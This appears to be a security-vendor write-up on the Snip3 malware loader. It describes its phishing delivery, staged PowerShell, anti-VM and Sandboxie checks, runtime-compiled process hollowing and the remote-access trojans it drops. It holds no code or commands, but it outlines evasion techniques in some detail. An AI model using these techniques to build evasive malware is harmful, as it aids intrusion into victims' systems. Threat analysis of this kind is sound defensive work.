Snip3 Loader Description
Researchers at Morphisec have discovered a new threatening and highly sophisticated malware threat that they have named 'Snip3' cryptor. The threat is offered in a Cryptor-as-a-Service scheme and is being used in ongoing attack campaigns that deliver numerous RAT (Remote Access Trojans) strains as final payloads on the compromised machines. The most powerful features of the Snip3 loader are its detection-avoidance and anti-analysis capabilities based on several advanced techniques, such as executing PowerShell code with the 'remotesigned' parameter, using Pastebin and top4top for staging, compiling runPE loaders in runtime, and checking for Windows Sandbox and VMWare virtualization.
The attack chain is comprised of multiple stages with the initial attack vector being disseminated through phishing emails. The lure messages try to trick the targeted user into downloading a corrupted visual basic file. In some instances, the threat actors instead used a large install file to hide the delivery of their malware tool.
The Initial Stage of Snip3 Attack
The first stage involves the deployment of a VB script that is responsible for prepping and initializing the next stage of the malware attack - a second-stage PowerShell script. Infosec researchers have managed to identify four main versions of the VB script alongside 11 sub-versions. What differentiates the 4 versions is the exact method used to load the next-sage PowerShell, while the sub-versions employ different obfuscations types. It should be noted that at this early stage, the threat actor has implemented a rather unique technique observed in some of the versions - the script executes the PowerShell with a '-RemoteSigned' parameter as a command.
Second Stage of the Snip3 Operation
The second stage revolves mainly around making sure that the malware is not being executed in a virtual environment. If everything appears to be within expectations, the PowerShell script will then move on to load RUnPE to execute the selected RAT payload within a hollowed Windows process reflectively.
Snipe3 is equipped with extra anti-VM measures when compared to the usual code seen in the wild is not capable of detecting Microsoft Sandbox. To check for any potential VMs such as VMWare, VirtualBox, or Windows Sandbox, the PowerShell script extracts the Manufacturer string and compares it to a list of hardcoded strings. To detect Sandboxie environments, the malware attempts to resolve a handle to a DLL named SbieDll.dll. If a VM is found, the malware terminates its operations without delivering the RAT payload.
The Deployment of a RAT Threat
The last stage of Snip3's operations sees the threat deliver a selected RAT malware to the infected system. The delivery mechanism differs from what is commonly observed in other threatening campaigns. Snip3 doubles down on its stealthiness by carrying an embedded and compressed (GZIP) source code that is compiled in runtime. This source code appears to be a modified version of the runPE from a GitHub repository named NYAN-x-CAT.
So far, several RAT threats have been observed to be dropped as the final payload by Snip3. Most often the deployed threats are ASyncRAT or RevengeRAT. However, there have been cases when Snip3 variants have delivered AgentTesla or the NetWire RAT.
Organizations should take into account the disclosed IoC (Indicators-of-Compromise) and take into account the capabilities of Snip3 that allow it to bypass detection-centric solutions easily.